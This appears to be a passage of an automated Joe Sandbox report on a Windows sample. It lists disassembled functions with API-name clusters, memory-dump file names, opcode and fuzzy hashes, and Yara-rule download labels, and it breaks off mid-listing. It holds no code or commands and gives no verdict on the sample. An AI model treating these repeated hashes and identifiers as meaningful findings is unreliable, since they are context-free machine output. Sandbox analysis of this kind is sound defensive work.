                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$InfoMonitorOffsetWindow$AttributesCopyCursorEmptyFromLayeredLoadParametersPointShowSystem
                                                                            • String ID:
                                                                            • API String ID: 264503638-0
                                                                            • Opcode ID: dce7f88ef741544c4c9d67f35e2c56864266f033f4e595000d6e10da0c9dc876
                                                                            • Instruction ID: 7ed77f168fd17e292b3f0251d98b6f67869e58d0a54a5e6c72a95767aa8c6930
                                                                            • Opcode Fuzzy Hash: dce7f88ef741544c4c9d67f35e2c56864266f033f4e595000d6e10da0c9dc876
                                                                            • Instruction Fuzzy Hash: 06916C36710A809AFB12EB67D4547ED23A1FB8CB94F448126EF0A57BA5DF38C945C740
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400802B4 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 239windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Gdip$Image$BitmapBits$ColorHeightLockPaletteTableUnlockWidth
                                                                            • String ID: &
                                                                            • API String ID: 603721357-3042966939
                                                                            • Opcode ID: 72520d758f942a503d2819024fc85e6ce2ae128253b91d3ccfb408e97973d2c1
                                                                            • Instruction ID: 3ee80e08199bbfa779cd1ddd78611eee196e197e55dc7482721ab755957adea3
                                                                            • Opcode Fuzzy Hash: 72520d758f942a503d2819024fc85e6ce2ae128253b91d3ccfb408e97973d2c1
                                                                            • Instruction Fuzzy Hash: 48A19C73210A818BEB62DF27D8407DA37A4F758BD8F004526EF1A4BBA9DB74D605CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400FC280 Relevance: 12.0, APIs: 7, Instructions: 1532COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: std::ios_base::~ios_base$ExceptionParentRectThrow$EmptyWindow_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 2711201615-0
                                                                            • Opcode ID: 09ec593d255c5a159ca69f8169326a33d91a88d24d0c2bffb43374e3cab98bd2
                                                                            • Instruction ID: cae3bd18125fa3acf9cdae65962db140a898e8841669724c0c8d5aece1360557
                                                                            • Opcode Fuzzy Hash: 09ec593d255c5a159ca69f8169326a33d91a88d24d0c2bffb43374e3cab98bd2
                                                                            • Instruction Fuzzy Hash: 4CD25D32210A4486EA66EB27D5A57EE6361FB8DBC4F445029EF4F47BB2DE78E441D300
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140156870 Relevance: 10.8, APIs: 7, Instructions: 317COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$Rect$Empty$Window
                                                                            • String ID:
                                                                            • API String ID: 1870126367-0
                                                                            • Opcode ID: 5ba22e782a801eccfd3501afd96798e699f51748e0029cbf430a77bd7eafc071
                                                                            • Instruction ID: ca1156d6a2a226f9de1d7bfbba8c58ea67a294a24e09bcc63e175c3b8162e121
                                                                            • Opcode Fuzzy Hash: 5ba22e782a801eccfd3501afd96798e699f51748e0029cbf430a77bd7eafc071
                                                                            • Instruction Fuzzy Hash: 05C10436714A9085EB05EBA7E8907ED27A0BB8DFC4F095026DF0E97B66DE39C441C704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140158370 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 256COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$LockRectUpdate$Copy
                                                                            • String ID: 6
                                                                            • API String ID: 2992910783-498629140
                                                                            • Opcode ID: 652a8301efe8cdd8df316e96a0fe1c9df0e04a397a379a47af6c6642e83b352a
                                                                            • Instruction ID: 783501a4e73ab3c1924acf5550ab67273782ed861fa34d4805c1dcfc66db961f
                                                                            • Opcode Fuzzy Hash: 652a8301efe8cdd8df316e96a0fe1c9df0e04a397a379a47af6c6642e83b352a
                                                                            • Instruction Fuzzy Hash: 0DA19E3671068186EB05DBA7D8947ED27A1BB8CFC8F499526DF0A67B65DF38C401CB04
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140152154 Relevance: 10.7, APIs: 7, Instructions: 234windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Long$ClassMessageSendSystemWindow
                                                                            • String ID:
                                                                            • API String ID: 2993048677-0
                                                                            • Opcode ID: 5845efb493f626df1cf0549473e59315d0ad35be4aa24ceaa7189a38b154f427
                                                                            • Instruction ID: e15764b0db0e03e835221e5a581c7aafa023a6447e80fef72c8dba48731ab533
                                                                            • Opcode Fuzzy Hash: 5845efb493f626df1cf0549473e59315d0ad35be4aa24ceaa7189a38b154f427
                                                                            • Instruction Fuzzy Hash: 1FA18F3621468086EB65DB27E4543EE6361F78EF94F484225EF6A4BBE1DF39C541C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014015C2D8 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Redraw$ClientScreen$RectTimer
                                                                            • String ID: /
                                                                            • API String ID: 26607385-2043925204
                                                                            • Opcode ID: 0a3b29e73952d5148bf47d219ca2eb51ce00bd341fc387a26e140244e797ba29
                                                                            • Instruction ID: 4d401808a4655bfbabc02a52809821df50b78c344914ebb37e2a02e4ff5d92e7
                                                                            • Opcode Fuzzy Hash: 0a3b29e73952d5148bf47d219ca2eb51ce00bd341fc387a26e140244e797ba29
                                                                            • Instruction Fuzzy Hash: 67913D3631568086EA16EB67E5547ED6361BB8DFC0F485021EF0A4BBA6DF39C511C704
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014016E3B0 Relevance: 10.6, APIs: 7, Instructions: 145windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$IconLoad$ClassExceptionLongThrow
                                                                            • String ID:
                                                                            • API String ID: 1634575180-0
                                                                            • Opcode ID: bda70c2ce5368a83901fc2a74ebea089a940846b70b56b564ea54febd301bbc5
                                                                            • Instruction ID: 0b76840bcca805542515d74292dcd280e11a407298cde9f1598baf9387dc3697
                                                                            • Opcode Fuzzy Hash: bda70c2ce5368a83901fc2a74ebea089a940846b70b56b564ea54febd301bbc5
                                                                            • Instruction Fuzzy Hash: E6516E35300B8086EB66EB63E9947EE27A1EB8DFC4F4855219F5E47BA6DE38D441C301
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014013E6C0 Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Redraw$Visible
                                                                            • String ID:
                                                                            • API String ID: 1637130220-0
                                                                            • Opcode ID: 409fe66dd77c07c7b7f765cca77378ce19a3d9dc0158cc62bb3bc341edeeadff
                                                                            • Instruction ID: 9ba695fd84e26366babb64907a32b19d68e20b9f8e94b10e1ebdb90aed8bd6e8
                                                                            • Opcode Fuzzy Hash: 409fe66dd77c07c7b7f765cca77378ce19a3d9dc0158cc62bb3bc341edeeadff
                                                                            • Instruction Fuzzy Hash: 3F512A36714A4482FA66DF27E8947EA73A0FB8CFC4F145025DF4A8B6B0DE79C5068744
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140093FEC Relevance: 9.6, APIs: 6, Instructions: 634COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Client$ConditionHashIntersectMask$EmptyImplImpl::InflateInfoLongMetricsSystemVerifyVersionWindow
                                                                            • String ID:
                                                                            • API String ID: 4129552557-0
                                                                            • Opcode ID: e747a61e9c0731c67c822f5b42d6cabd4835da2cd403239e1808dae041b1afa0
                                                                            • Instruction ID: 02ec1eecf3b28572dd6deb6ce9c3c26d1e6ff52faeab7eda545a5e34d8ccd1d5
                                                                            • Opcode Fuzzy Hash: e747a61e9c0731c67c822f5b42d6cabd4835da2cd403239e1808dae041b1afa0
                                                                            • Instruction Fuzzy Hash: 0D52BC32624A9586EB12DB67E444BED73A4FB8DBC8F458216EF0957BB5DB78C840C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001400C0564 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryExceptionMenuThrow__report_securityfailure_cwprintf_s_lstd::ios_base::~ios_base
                                                                            • String ID: &%d %Ts$Recent File
                                                                            • API String ID: 4135784057-993655659
                                                                            • Opcode ID: 355f372e7fa2f6aa233080dd4b98b2fb6dce10f53e64cb44d46bf2d7fc4a526a
                                                                            • Instruction ID: 2e64aed256bbb5a07120bbe0d21b2bdb6608cefac2cef0188d5fc0116dd88002
                                                                            • Opcode Fuzzy Hash: 355f372e7fa2f6aa233080dd4b98b2fb6dce10f53e64cb44d46bf2d7fc4a526a
                                                                            • Instruction Fuzzy Hash: 6D127C36218B8186EA5ADF67D4943EE63A0F78DBD4F494126EF5947BA6DF38C801C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000000014003C388 Relevance: 9.2, APIs: 6, Instructions: 219fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FindPath$CharCloseExceptionFileFirstFullInformationNameThrowUpperVolume
                                                                            • String ID:
                                                                            • API String ID: 2923705660-0
                                                                            • Opcode ID: a085fa28f57ec527c8c96ab7cd16f4eec7f2f3044cc184721b1f7643e3a6735e
                                                                            • Instruction ID: 430b533cce07087ab279d7e930388c5030057c858d2d547ba3f0f0793df7da52
                                                                            • Opcode Fuzzy Hash: a085fa28f57ec527c8c96ab7cd16f4eec7f2f3044cc184721b1f7643e3a6735e
                                                                            • Instruction Fuzzy Hash: 8581B171210A4041FA27AB2BA455BEF6390AB8DBE4F544A11FF6987BF5DF38C851C700
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401781F4 Relevance: 9.1, APIs: 6, Instructions: 88windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Parent$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 4191550487-0
                                                                            • Opcode ID: 0951ddaa1630b794e425368f44b63be50515e7ab2b2bc185e36350806b7c4ad6
                                                                            • Instruction ID: f9cd7551443dacc0560127e61de9704e38d3244a5eb463cbfd8f8edefdf3a124
                                                                            • Opcode Fuzzy Hash: 0951ddaa1630b794e425368f44b63be50515e7ab2b2bc185e36350806b7c4ad6
                                                                            • Instruction Fuzzy Hash: 6531C136B40A4092FB6A9B27F458BDE6760F78DF94F541021DF4A07BA6CF79C4908780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00000001401D83C4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317105290.00000001402ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_140000000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                            • String ID:
                                                                            • API String ID: 1239891234-0
                                                                            • Opcode ID: 996539c13bf56de6fff70cc47f328bc9d814000f53a173e515cb7ec8e31f5b4b
                                                                            • Instruction ID: a544c38855a6908e0c7bcf386b667b2c9e8f38dfa1ec4b25b4e08dd131a45271
                                                                            • Opcode Fuzzy Hash: 996539c13bf56de6fff70cc47f328bc9d814000f53a173e515cb7ec8e31f5b4b
                                                                            • Instruction Fuzzy Hash: 54319F36214B8186EB61CF26E8447DE33A4F788B58F54012AEB9D47BA8DF38C546CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0000000140162048 Relevance: 8.2, APIs: 5, Instructions: 684windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3316684941.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                                            • Associated: 00000000.00000002.3316664841.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3316911156.0000000140213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317003242.00000001402D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317023112.00000001402D8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3317043719.00000001402E3000.00000004.00000001.01000000.00000003.sdmpDownload File
